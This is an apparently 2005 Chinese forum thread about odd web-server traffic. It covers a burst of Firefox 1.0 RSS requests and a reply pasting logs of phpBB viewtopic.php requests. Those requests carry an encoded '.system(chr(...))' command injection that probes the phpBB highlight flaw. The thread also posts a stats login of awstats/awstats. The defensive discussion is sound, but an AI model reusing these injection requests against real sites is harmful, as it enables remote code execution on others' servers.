从日志中看到2月17日 blog.cnblog.org的index.xml有来自37908个IP的126258次访问,好像全部都是Firefox Gecko/20041124 Firefox/1.0 以至于Firefox已经成为占blog.cnblog.org总流量94.6% ?!
AWStats统计:Firefox流量: 2476911 94.6 %
为了防止referer spam:AWStats统计增加了用户认证:
用户名/密码: awstats/awstats
附:日志
61.183.75.59 - - [17/Feb/2005:00:00:03 +0800] "GET /index.xml HTTP/1.1" 200 27986 "-" "Mozilla/5.0 (Windows; U;
Windows NT 5.1; zh-CN; rv:1.7.5) Gecko/20041124 Firefox/1.0 (ax)"
222.222.60.121 - - [17/Feb/2005:00:00:04 +0800] "GET /index.xml HTTP/1.1" 200 27986 "-" "Mozilla/5.0 (Windows;
U; Windows NT 5.0; zh-CN; rv:1.7.5) Gecko/20041124 Firefox/1.0 (ax)"
61.178.91.19 - - [17/Feb/2005:00:00:05 +0800] "GET /index.xml HTTP/1.1" 200 27986 "-" "Mozilla/5.0 (Windows; U;
Windows NT 5.1; zh-CN; rv:1.7.5) Gecko/20041124 Firefox/1.0 (ax)"
218.74.30.48 - - [17/Feb/2005:00:00:05 +0800] "GET /index.xml HTTP/1.1" 200 27986 "-" "Mozilla/5.0 (Windows; U;
Win98; zh-CN; rv:1.7.5) Gecko/20041124 Firefox/1.0 (ax)"
218.6.63.136 - - [17/Feb/2005:00:00:06 +0800] "GET /index.xml HTTP/1.1" 200 27986 "-" "Mozilla/5.0 (Windows; U;
Win98; zh-CN; rv:1.7.5) Gecko/20041124 Firefox/1.0 (ax)"
楼上那位,你那个是phpbb的去年的一个重大漏洞,如果你没有打过补丁的话,就要当心了,后果会很严重。
firefox现在是越来越普遍了。我们的http://bbs.colorcodelab.com 也为firefox作了专门的优化,要知道,作为一个专业的网页设计论坛,http://bbs.colorcodelab.com 的这一举动等于是承认了firefox在设施是工作中的地位,我们不再仅仅要顾及IE的浏览效果,为了制作出最专业最优秀最精彩的网站,我们这些网页设计师还要为firefox优化我们的设计作品。
今天我的论坛的访问量也暴增。看了LOG文件,发现有很多这样的记录:
209.197.236.47 - - [18/Feb/2005:23:47:35 +0800] "GET /viewtopic.php?p=2329&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 40352 "-" "Mozilla/4.0"
69.44.154.240 - - [18/Feb/2005:23:47:28 +0800] "GET /viewtopic.php?p=3312&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 68435 "-" "Mozilla/4.0"
195.58.160.135 - - [18/Feb/2005:23:47:51 +0800] "GET /viewtopic.php?p=4422&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 31526 "-" "Mozilla/4.0"
62.212.125.2 - - [18/Feb/2005:23:47:51 +0800] "GET /viewtopic.php?p=2676&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 28232 "-" "Mozilla/4.0"
即出现很多 Esystem(chr(112) 或者 Echr(108) 之类的文字在 address 里面,感觉也很奇怪。
回复: 可能是REFERER SPAM吧?